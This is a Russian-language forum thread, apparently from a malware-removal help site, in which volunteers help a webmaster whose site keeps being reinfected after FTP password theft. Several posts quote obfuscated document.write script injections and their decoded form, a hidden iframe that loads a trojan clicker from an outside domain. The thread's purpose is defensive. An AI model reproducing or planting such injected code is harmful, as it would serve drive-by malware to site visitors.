Теперь компьютер чист, пароль поменян - значит, осталось очистить сайт от вредоносного кода и все должно стать хорошо ;)
Printable View
Теперь компьютер чист, пароль поменян - значит, осталось очистить сайт от вредоносного кода и все должно стать хорошо ;)
И после очистки сайта можно сделать контрольные логи.
Сайт вроде почистил, пароль поменял, сделал контрольные логи.
Зашел что бы их отправить, дай-ка думаю загляну на сайт - ВИРУС!
Я вам наверное уже поднадоел.
Опять диск что ли отформатировать?
И опускать руки не хочется, но что делать уже не знаю и уже просто нет веры в успех.
[ATTACH]41506[/ATTACH]
[ATTACH]41507[/ATTACH]
[ATTACH]41508[/ATTACH]
в логах ничего подозрительного ...
но вот этого достаточно что бы воровать ваши пароли три раза в день ....
Platform: Windows XP SP1 (WinNT 5.01.2600)
Прошу прощения, а что это значит?
это значит что дырявый сп1 давно обновить ... иначе это никогда не прекратится ...
понял, спасибо, завтра этим и займусь
Вчера форматнул диск, поставил SP2, перезалил зараженные файла на сайт, сменил пароль и сегодня все по-прежнему - Вирус!
Может он где-то там в файлах сидит и как-то самоустанавливается в индексовые файлы?
Какие еще версии, уважаемые знатоки?
Чтобы окончательно снять подозрения с вашего компьютера, надо сделать комплект логов на вашей новой системе. Как раз на днях свежая версия AVZ вышла - 4.30, скачайте, сделайте - посмотрим.
Может мне сделать архив базы и свалисть к другому хостеру?
Будет ли это выходом?
[size="1"][color="#666686"][B][I]Добавлено через 6 минут[/I][/B][/color][/size]
Ок, скачаю обязательно (сейчас что-то не пускает) и выложу логи.
Вот они мои логи.
По-моему все чисто.
хоть буркните что-нибудь! :)
..........ПОЖАЛУЙСТА!............
естественно ничего зловредного не видно ...
Ну ладно раз идей нет, выскажусь. [img]http://files.myopera.com/Creat0R/Opera_AC/Icons/Kolobki/bubble.gif[/img]
На сайте закладки много
[QUOTE]<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0032\u0036\u0030\u0033\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>[/QUOTE]
Которые расшифровываются как
[code]<iframe src=:http://ato****yan.biz/afterftpchek/2603/index.php width=1 height=1 style="display:none"></iframe>[/code]
А там сидит тот Trojan-Clicker.HTML.IFrame.mq возможно версии будут обновляться...это проблема "аффтара" который "рулит" источником заражения.
Почистите и установите сложный пароль.
Возможно это Ваш [url=http://www.i2r.ru/static/452/out_14876.shtml]случай[/url].
[size="1"][color="#666686"][B][I]Добавлено через 5 минут[/I][/B][/color][/size]
Учетная запись администратора переименнована и запороленна? Наличие расшар или доступ к компьютеру других лиц? Наличие хорошего фаервола?
Спасибо, akoK!
Наконец-то мы сдвинулись и в правильном направлении.
Т.е., правильно ли я понял, что в страницах присутствует вышеприведенный зловредный код, который нужно вычистить.
Но не совсем пойму следующее предложение: "это проблема "аффтара" который "рулит" источником заражения."
Проблема эта моя, не отрицаю, но почему я "рулю" источником заражения???
Меня уже перечистили и перепроверили неоднократно.
Файервол еще не поставил. Пытался читать, но еще не определился - выбор слишком большой.
Расшар и доступа других лиц нет. Пароль ставлю всегда сложный.
[size="1"][color="#666686"][B][I]Добавлено через 17 минут[/I][/B][/color][/size]
Да, действительно вышеприведенный код был во всех страницах в корневом каталоге.
Почистил, меняю пароль и выбираю файервол.
[quote=Sokil;213242]Т.е., правильно ли я понял, что в страницах присутствует вышеприведенный зловредный код, который нужно вычистить.[/quote]
А-а, дак вы это еще не сделали?? :>
Я же говорил об этом еще в сообщении #41.
[quote=Sokil;213242]Но не совсем пойму следующее предложение: "это проблема "аффтара" который "рулит" источником заражения."
Проблема эта моя, не отрицаю, но почему я "рулю" источником заражения???[/quote]
Речь там о возможных обновлениях трояна, "аффтар" - не вы, а тот, кто содержит сайт, указанный в коде iframe, с которого грузится этот троян ;).
Я делал это постоянно в тех файлах, которые мне советовал разработчик.
А сегодня обнаружил это во всех :)
И снова здравствуйте!
Почистил все страницы вручную, сменил пароль, но помогло ненадолго.
На главной странице периодически вставляетчя вот такой код:
<!-- o --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u0075\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');</script><!-- c -->
Откуда бьет?
Файервол пока не поставил, но что-то мне не сильно верится, что все дело в этом.
Причем, что интересно - хостится у меня там же еще один сайт, но там все чисто.
Осознанная целенаправленная атака.
Если я вам поднадоел - скажите не стесняйтесь - даже не обижусь.
Просто мне кажется, что вам, как проффесионалам должно быть интересно, а мне полезно.
От нашего с вами общения.
Спасибо.
Который расшифровываеться как
[code]<ifu00 72ame src= http://tu ****affurl.u00 72u/sliv/i ndex.phpu 0020width=1u00 20height=1 style="u 0064isplay:u00 6eone"></i frame>[/code]
Прочитайте последний абзац в документе ссылку на который я Вам давал в посте №54.
Приветствую, Вас, господа!
Прочел я этот документ, со второго раза понял там намного больше, но честно говоря, где в Винде устаналиваются эти параметры я не знаю, а спрашивать у Вас наверное неуметно - это мне уже в другой форум. :)
Я решил поступить иначе.
Если это действительно программой-сниппером меня "сканят", то если пароль поменяю не я, то соответственно скань меня сколько влезит, а пароль не узнаешь.
Логично?
Сегодня я в очередной раз вычистил вручную код и попросил хостеров сменить мне пароль и выслать его почтой.
И что Вы думаете?
Хватило на пару-тройку часов.
Хочу понять где же "дыра". Сократить угол обстрела, так сказать.
Компьютер мой уже исключается полностью.
Ну не читают же они всю мою корреспонденцию!!!...
Поменять хостера?
Возни прилично, а решит ли это проблему?
Ну на кого еще думать?
Даже Вы вне подозрения! :)
В общем есть такая прога - Avira AntiVir Personal.
Вот что она понаходила после всех чисток AVZ!
Об окончательной победе говорить еще рано, но судя даже по названиям вирусов - очень даже в тему...
Так что, уважаемые знатоки - есть над чем работать! :)
@ [b]Sokil[/b]
Без обиды, но чтобы все читатели правильно всё поняли: давайте посмотрим на вещи как есть - 05-04-2008 (10 дней назад!) комп был чистым 'после всех чисток AVZ'. Вы просто не до конца выполнили просьбу Хелперов: 'очистить сайт от вредоносного кода' - в таком случае претензий не могут быть ни к хелперам, ни к AVZ - вы просто заново заразили комп, и всё... :)
Выполните [url=http://virusinfo.info/showthread.php?t=1235]правила[/url].
Paul
@ [B]Sokil[/B]
Ничего удивительного тут нет,просто нужно выполнять все наши рекомендации и действовать строго в указанном порядке,а иначе мы просто будем с вами водить "хоровод",в смысле все по кругу;)
ИМХО следует поменять хостера, дырка может быть у него. Это я про возможное заражение сайта.
Вообще схема лечения такая:
1. Очистить домашний комп
2. Очистить сайт, поменять пароли, не заразив домашний комп.
3. В случае повторного заражения сайта искать источник заражения - хостер, рабочий компьютре, еще кто-то, имеющий пароль и т.д.
А вообще, вышеговорящие товарищи правы.
Э-э...
Я наверное не правильно выразился..
Это Вы без обид!!!
Я не в смысле претензии к Вам.
Помогали, вникали, советовали - и за это Вам БОЛЬШУЩЕЕ СПАСИБО!
По поводу 10 дней. У меня есть лог вчерашний. И по-моему тоже чистый -
О вирусов, 0 подозрений.
Сам для себя делал.
А сайт я чистил вручную и не раз.
Но, к сожалению воз и ДАЖЕ нынче там.
Может там какой-то код где-то и запрятался. Перелопатить все вручную очень сложно - слишком большое кол-во файлов. Но на тот код, о котором мы говорили ничего похожего нет.
Переезжать буду однозначно в самое ближайшее время, залью заново все чистенькое, а там и посмотрим. :) - у меня уже истерика.
Вы уже у Google в черном списке
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]2[/B][*]Обработано файлов: [B]19[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] d:\\program files\\aswpro\\aswpro.exe - [B]not-a-virus:FraudTool.Win32.XPAntivirus.bz[/B] (DrWEB: Trojan.Fakealert.373)[/LIST][/LIST]